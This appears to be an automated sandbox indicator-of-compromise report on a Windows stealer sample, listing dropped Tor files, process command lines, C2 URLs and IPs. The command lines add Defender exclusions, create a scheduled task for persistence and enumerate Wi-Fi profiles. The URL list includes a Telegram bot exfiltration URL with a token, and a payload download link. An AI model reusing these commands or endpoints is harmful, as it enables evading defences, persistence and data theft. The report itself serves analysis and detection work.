IOC Report
yt7dW9nyJK.exe

loading gif

Files

File Path
Type
Category
Malicious
yt7dW9nyJK.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\libgcc_s_sjlj-1.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssl-1_1.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssp-0.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\libwinpthread-1.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exe
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\tor\zlib1.dll
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yt7dW9nyJK.exe.log
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\ffmaba.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\77rh3rhsc7\p.dat
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\report.lock
very short file (no magic)
modified
C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\cached-certs (copy)
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\cached-certs.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\cached-microdesc-consensus (copy)
ASCII text, with very long lines (1006)
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\cached-microdesc-consensus.tmp
ASCII text, with very long lines (1006)
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\cached-microdescs.new
ASCII text, with very long lines (16050)
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\state (copy)
ASCII text, with very long lines (354), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\state.tmp
ASCII text, with very long lines (354), with CRLF line terminators
modified
C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\unverified-microdesc-consensus (copy)
ASCII text, with very long lines (1006)
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\unverified-microdesc-consensus.tmp
ASCII text, with very long lines (1006)
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\geoip
ASCII text
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\geoip6
ASCII text
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hostname (copy)
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hostname.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hs_ed25519_public_key (copy)
data
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hs_ed25519_public_key.tmp
data
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hs_ed25519_secret_key (copy)
data
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\host\hs_ed25519_secret_key.tmp
data
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-bg.vbs
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor.vbs
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ffmaba.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vzidghc.2bo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10rpa0bt.dkd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2azbi2s3.4qv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ntiddy0.31e.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fkzvqki.fxm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40ktdn3n.ckf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qpvytti.coy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_azpums4v.sv1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ca2jurgy.glb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cilcvib5.zor.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjkjqjlg.bnv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctqykilo.cyc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxsb4ggp.fvl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dquy3ezh.yuf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elt4ncus.rgi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hckj2gxm.rnb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1mvds3v.v0w.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0101xle.s0i.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzwpiuff.jmv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3z3ak3j.32l.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_me1qx4rb.hmp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvzsxaxf.dyh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mw1hfszi.jap.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrbnls0v.d4f.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oobpaqwn.zug.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_othxcp55.tz1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owckkmfr.2im.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfkd13xr.iph.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjkk3gez.ban.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rro0gacx.wcr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh5byygc.xcj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbqj0aob.upn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcj25nk1.nzq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y24pgiam.yva.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2dz5e41.4xu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhcdduuo.nrr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmpCBEE.tmp
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
\Device\ConDrv
ASCII text, with very long lines (307), with CRLF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped
There are 69 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\yt7dW9nyJK.exe
"C:\Users\user\Desktop\yt7dW9nyJK.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"
malicious
C:\Users\user\Desktop\yt7dW9nyJK.exe
"C:\Users\user\Desktop\yt7dW9nyJK.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'
malicious
C:\Users\user\AppData\Local\Temp\ffmaba.exe
"C:\Users\user\AppData\Local\Temp\ffmaba.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
malicious
C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
"C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
malicious
C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
malicious
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profiles
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
malicious
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
malicious
C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
malicious
C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
malicious
C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\timeout.exe
timeout /t 3
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
"C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\findstr.exe
findstr "SSID BSSID Signal"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 33 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.telegram.org/bot
unknown
malicious
securefirewall.portmap.io
malicious
https://blog.torproject.org/v2-deprecation-timelineCalled
unknown
malicious
https://blog.torproject.org/v2-deprecation-timeline
unknown
malicious
https://api.telegram.org
unknown
malicious
https://api.tele
unknown
malicious
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
http://156.245.141.24:8080
unknown
https://138.2.92.67:443
unknown
https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s
unknown
http://crl.microsoft
unknown
http://185.119.118.59:8080
unknown
https://www.torproject.org/
unknown
https://192.99.196.191:443
unknown
https://101.126.19.171:443
unknown
http://ip-api.com/line?fields=query,country
208.95.112.1
https://libyaalahrar.co/uploaded/JxTcJM84e3NbGP4mm.exe
199.188.200.89
https://nuget.org/nuget.exe
unknown
http://156.245.141.8:8080
unknown
http://ip-api.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://185.119.118.59:8080/get
unknown
http://129.151.109.160:8080
unknown
http://47.88.59.12:80
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://aka.ms/pscore6lBcq
unknown
https://contoso.com/Icon
unknown
http://121.171.125.177:9000
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://ip-api.com/line?fields=query
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://github.com/Pester/Pester
unknown
http://212.233.122.65:8000
unknown
http://216.39.242.18:8080
unknown
http://127.0.0.1:
unknown
http://185.119.118.59:8080/%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%
unknown
http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user
unknown
http://crl.micro
unknown
https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan
unknown
https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=68783
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
unknown
http://127.0.0.1:2789/
unknown
https://www.torproject.org/download/download#warning
unknown
http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user
unknown
http://api.telegram.org
unknown
http://185.119.118.59:8080t-cq
unknown
http://crl.microfZ
unknown
http://194.114.131.47:8080
unknown
http://185.217.98.121:80
unknown
https://github.com
unknown
http://156.245.148.3:8080
unknown
https://contoso.com/License
unknown
http://156.245.142.3:8080
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://156.245.143.25:8080
unknown
https://44.228.161.50:443
unknown
https://bugs.torproject.org/tpo/core/tor/14917.
unknown
http://47.110.140.182:8080
unknown
https://blog.torproject.org/blog/lifecycle-of-a-new-relay
unknown
http://127.0.0.1:2789/pData
unknown
http://156.245.146.28:8080
unknown
http://156.245.146.30:8080
unknown
https://www.torproject.org/documentation.html
unknown
http://156.245.143.23:8080
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://freehaven.net/anonbib/#hs-attack06
unknown
http://156.245.144.19:8080
unknown
https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9
unknown
http://47.96.78.224:8080
unknown
http://nuget.org/NuGet.exe
unknown
https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROU
unknown
http://185.119.118.59:8080/d0Ouaqizfz/iAAD9_user
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTML
149.154.167.220
http://156.245.142.6:8080
unknown
http://149.88.44.159:80
unknown
http://www.microsoft.
unknown
https://bugs.torproject.org/tpo/core/tor/21155.
unknown
http://101.126.19.171:80
unknown
https://185.217.98.121:443
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://156.245.147.30:8080
unknown
https://objects.githubusercontent.com
unknown
https://www.torproject.org/download/download#warningalphabetaThis
unknown
http://mingw-w64.sourceforge.net/X
unknown
https://sabotage.net
unknown
http://127.0.0.1:18772/handleOpenWSR?r=
unknown
https://support.mozilla.org
unknown
https://bugs.torproject.org/tpo/core/tor/8742.
unknown
https://www.torproject.org/docs/faq.html#BestOSForRelay
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 88 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
securefirewall.portmap.io
193.161.193.99
malicious
ip-api.com
208.95.112.1
malicious
api.telegram.org
149.154.167.220
malicious
libyaalahrar.co
199.188.200.89
github.com
140.82.121.3
objects.githubusercontent.com
185.199.108.133

IPs

IP
Domain
Country
Malicious
193.161.193.99
securefirewall.portmap.io
Russian Federation
malicious
208.95.112.1
ip-api.com
United States
malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
72.132.134.217
unknown
United States
140.78.100.15
unknown
Austria
140.82.121.3
github.com
United States
199.188.200.89
libyaalahrar.co
United States
95.217.36.40
unknown
Germany
193.142.146.239
unknown
Netherlands
51.158.147.144
unknown
France
185.199.108.133
objects.githubusercontent.com
Netherlands
148.251.191.252
unknown
Germany
127.0.0.1
unknown
unknown
185.119.118.59
unknown
Austria
There are 4 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\yt7dW9nyJK_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ffmaba_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
25CB000
trusted library allocation
page read and write
malicious
2BD1000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
26FF000
trusted library allocation
page read and write
3EE4000
heap
page read and write
4AFD000
trusted library allocation
page read and write
3F00000
heap
page read and write
4660000
trusted library allocation
page read and write
3610000
heap
page read and write
3009000
trusted library allocation
page read and write
4247000
heap
page read and write
8B90000
heap
page read and write
9970000
heap
page read and write
76A0000
trusted library allocation
page read and write
4463000
heap
page read and write
2F7B000
trusted library allocation
page read and write
85D0000
trusted library allocation
page execute and read and write
3F8A000
heap
page read and write
54A0000
heap
page read and write
94D000
stack
page read and write
2720000
heap
page read and write
FE0000
trusted library allocation
page read and write
2FEB000
trusted library allocation
page read and write
6F58000
heap
page read and write
2E11000
trusted library allocation
page read and write
2B10000
heap
page execute and read and write
12A7000
trusted library allocation
page execute and read and write
271F000
trusted library allocation
page read and write
7750000
heap
page read and write
8B4E000
stack
page read and write
4824000
trusted library allocation
page read and write
27F5000
trusted library allocation
page read and write
73FC000
heap
page read and write
479C000
trusted library allocation
page read and write
258E000
stack
page read and write
263E000
trusted library allocation
page read and write
2ABE000
stack
page read and write
9F6B000
trusted library allocation
page read and write
2781000
trusted library allocation
page read and write
4B84000
trusted library allocation
page read and write
F4A000
heap
page read and write
5B7000
stack
page read and write
2D48000
stack
page read and write
6F74000
heap
page read and write
99A8000
heap
page read and write
2FAD000
trusted library allocation
page read and write
311E000
stack
page read and write
4CDC000
heap
page read and write
27B3000
